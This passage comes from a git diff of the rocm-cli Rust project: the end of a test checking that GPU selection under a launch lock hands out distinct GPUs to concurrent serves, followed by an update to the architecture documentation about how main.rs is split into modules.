`--gpu auto` serves both read the same GPU as free and land on it. + // + // The test does NOT take the lock itself — that would only prove + // `FileLock` excludes (already covered by + // `file_lock_serializes_concurrent_holders` in rocm-core). It calls + // `select_gpu_indices_under_launch_lock`, the production helper `serve()` + // uses, whose contract is that it returns the guard *it* acquired together + // with the selection; the test holds that guard across the claim exactly + // as `serve()` holds it until `spawn_managed_engine_child` persists the + // record. Delete the `FileLock::acquire` from that helper and this test + // goes red: both threads then select GPU 0. + // + // Determinism: the barrier releases both threads together and each sleeps + // between select and claim, so an unlocked helper double-books GPU 0 + // regardless of scheduling skew, while the locked helper forces the second + // thread to observe the first thread's claim. + let (root, paths) = test_paths("launch-lock-atomic-claim"); + paths.ensure().expect("prepare paths"); + let detected = Some(2_usize); + + let barrier = std::sync::Barrier::new(2); + let selections = std::thread::scope(|scope| { + let handles: Vec<_> = [("svc-race-a", 21001_u16), ("svc-race-b", 21002_u16)] + .into_iter() + .map(|(service_id, port)| { + let paths = &paths; + let barrier = &barrier; + scope.spawn(move || { + barrier.wait(); + // The exact call `serve()` makes: the helper acquires the + // launch lock and selects under it, handing the guard back. + // `None` visibility keeps selection mask-unaware for the + // test host; `pinned` `None` + `cpu_only` false is the + // `--gpu auto` path that reads live busy-GPU state. + let (gpu, lock) = select_gpu_indices_under_launch_lock( + paths, + false, + None, + || detected, + None, + None, + ) + .expect("auto GPU selection under launch lock"); + // Widen the select→claim window so an unlocked helper + // deterministically double-books GPU 0; under the lock the + // second thread cannot enter until we claim. + std::thread::sleep(Duration::from_millis(50)); + write_claiming_record(paths, service_id, port, &gpu); + drop(lock); + gpu + }) + }) + .collect(); + handles + .into_iter() + .map(|handle| handle.join().expect("selection thread joins")) + .collect::>() + }); + + let mut picked: Vec = selections.into_iter().flatten().collect(); + picked.sort_unstable(); + assert_eq!( + picked, + vec![0, 1], + "serialized select-then-claim must hand out distinct GPUs, got {picked:?}" + ); + + let _ = fs::remove_dir_all(&root); + } +} diff --git a/docs/architecture.md b/docs/architecture.md index f292ca17f..9fe3441b9 100644 --- a/docs/architecture.md +++ b/docs/architecture.md @@ -14,8 +14,8 @@ This is the living module map for rocm-cli. It's a contributor-facing reference New subcommands and subsystems default to their own file from day one — they should not grow inside `main.rs`/`lib.rs` waiting for a future extraction pass. Two extraction patterns already exist in the codebase; use whichever fits: -- **Full domain extraction** — a subsystem's domain implementation moves into its own file that owns its own types (structs/enums), not just relocated functions; that ownership is what distinguishes this pattern from mechanical relocation below — every `apps/rocm` module is a private `mod x;` accessed via qualified paths (e.g. `comfyui::render_status(...)`) regardless of pattern, so module privacy alone doesn't tell the two apart. Where a subsystem has a dedicated clap subcommand, its command enum and dispatch function usually stay in `main.rs` (e.g. `ComfyuiCommand`/`comfyui()`, `RuntimesCommand`/`runtimes()`) — but not every domain-extracted module has one (`providers.rs` has no dedicated command enum; it's invoked from the existing chat/config command flows). In library crates (`crates/rocm-core`) the module is `pub mod x;` plus a `pub use x::{...};` re-export, since it's part of the crate's public API. This is the default for new subsystems. Examples: `apps/rocm/src/therock.rs` (`RuntimesCommand`), `comfyui.rs` (`ComfyuiCommand`), `providers.rs` (no dedicated command enum); `crates/rocm-core`'s `diagnose.rs`/`examine.rs`. -- **Mechanical relocation** — a `pub(crate) fn` moves out verbatim, with shared types/config staying at the crate root and reached via `crate::`. Used for dispatch-adjacent clusters where a minimal, easy-to-review diff matters more than full extraction. Examples: `apps/rocm/src/automations.rs`, `uninstall.rs`. +- **Full domain extraction** — a subsystem's domain implementation moves into its own file that owns its own types (structs/enums), not just relocated functions; that ownership is what distinguishes this pattern from mechanical relocation below — every `apps/rocm` module is a private `mod x;` regardless of pattern, so module privacy alone doesn't tell the two apart. Full-domain-extraction modules are typically reached via qualified paths (e.g. `comfyui::render_status(...)`); mechanically relocated modules with no owned types are reached the same way (e.g. `endpoint_keys::...`, `logging::init`). The exception — reached unqualified through `use crate::x::{...}` re-imports, matching their dispatch call sites' pre-extraction form — is limited to the clusters that moved as a dispatch-adjacent group: `automations.rs`, `uninstall.rs`, and (as of Phase 6a, ROCMAI-82) `driver_install.rs`, `engines_cmd.rs`, `serve_cmd.rs`. Where a subsystem has a dedicated clap subcommand, its command enum and dispatch function usually stay in `main.rs` (e.g. `ComfyuiCommand`/`comfyui()`, `RuntimesCommand`/`runtimes()`) — but not every domain-extracted module has one (`providers.rs` has no dedicated command enum; it's invoked from the existing chat/config command flows). In library crates (`crates/rocm-core`) the module is `pub mod x;` plus a `pub use x::{...};` re-export, since it's part of the crate's public API. This is the default for new subsystems. Examples: `apps/rocm/src/therock.rs` (`RuntimesCommand`), `comfyui.rs` (`ComfyuiCommand`), `providers.rs` (no dedicated command enum); `crates/rocm-core`'s `diagnose.rs`/`examine.rs`. +- **Mechanical relocation** — a `pub(crate) fn` moves out verbatim, with shared types/config staying at the crate root and reached via `crate::`. Used for dispatch-adjacent clusters where a minimal, easy-to-review diff matters more than full extraction. Examples: `apps/rocm/src/automations.rs`, `uninstall.rs`. Variant: when the cluster is large enough to own private types (part of `main.rs`'s Phase 6a split, ROCMAI-82), those types move with it instead of staying in `main.rs` — `engines_cmd.rs`'s types are used nowhere else, but `driver_install.rs`'s `DriverInstallResult`/`DriverInstallError` are `pub(crate)` and read from `main.rs`'s `install()` (`result.output`/`result.executed`, `error.source`/`error.executed`); `serve_cmd.rs`'s `ServeEngineSelection`/`ServeArgs` stay `pub(crate)`, though only `ServeArgs` is also used from `main.rs` — `ServeEngineSelection` has no caller outside `serve_cmd.rs` itself, and `ServeGenerationDefaults` is private. The pattern is still "mechanical relocation" rather than full domain extraction because the handler fn itself relocates (`install_driver()`/`engines()`/`serve()`) while the top-level dispatch fns (`install()`/`dispatch()`) stay in `main.rs` — which full domain extraction's command-enum-and-dispatch-fn-stay-in-`main.rs` convention above does not do. There is no file-line-count CI gate enforcing this — `too_many_lines = "allow"` in the workspace `Cargo.toml` is a deliberate, function-level choice, not an oversight. This convention is the guardrail instead. @@ -25,9 +25,9 @@ Scoped to the crates that make up the shipped CLI/daemon/dashboard/engine surfac ### `apps/rocm` — main CLI binary -Subsystem modules already following full domain extraction (each owns its own types): `therock.rs`, `comfyui.rs`, `providers.rs`, `chat_host_facts.rs`, `dash.rs`, `dash_seam.rs`, `provider_keys.rs`, `serve_summary.rs`, `storage.rs`. Mechanically relocated dispatch-adjacent handlers (no owned types, shared config stays at the crate root): `automations.rs`, `uninstall.rs`, `endpoint_keys.rs`, `logging.rs`. `bootstrap.rs` is a further-extracted variant of full domain extraction: it owns its clap command enum (`BootstrapCommand`) and dispatch function too, rather than leaving them in `main.rs`. Shared CLI-output components: `cli_progress.rs` (`Spinner`, `AnimatedSpinner`), `cli_report.rs` (`ActionReport`). +Subsystem modules already following full domain extraction (each owns its own types): `therock.rs`, `comfyui.rs`, `providers.rs`, `chat_host_facts.rs`, `dash.rs`, `dash_seam.rs`, `provider_keys.rs`, `serve_summary.rs`, `storage.rs`. Mechanically relocated dispatch-adjacent handlers (no owned types, shared config stays at the crate root): `automations.rs`, `uninstall.rs`, `endpoint_keys.rs`, `logging.rs`. Mechanically relocated clusters that do own private types (see the Phase 6a variant note above): `driver_install.rs` (`install_driver()`/`reconcile_driver_install()`, plus the driver-plan/state types), `engines_cmd.rs` (`engines()`, plus env-root/runtime resolution — several helpers here are also called from `serve_cmd.rs` and from other root-level commands, so they stay `pub(crate)`), `serve_cmd.rs` (`serve()`, plus engine-recipe overrides). `bootstrap.rs` is a further-extracted variant of full domain extraction: it owns its clap command enum (`BootstrapCommand`) and dispatch function too, rather than leaving them in `main.rs`. Shared CLI-output components: `cli_progress.rs` (`Spinner`, `AnimatedSpinner`), `cli_report.rs` (`ActionReport`). -`main.rs` itself is **not yet modularized** — see EAI-7768, split planned across several PRs, one cluster at a time. +`main.rs` itself is **partially modularized** — Phase 6a (ROCMAI-82) extracted the driver-install/engines/serve clusters above; the rest of the split is planned across several more PRs, one cluster at a time (see EAI-7768). ### `apps/rocmd` — background daemon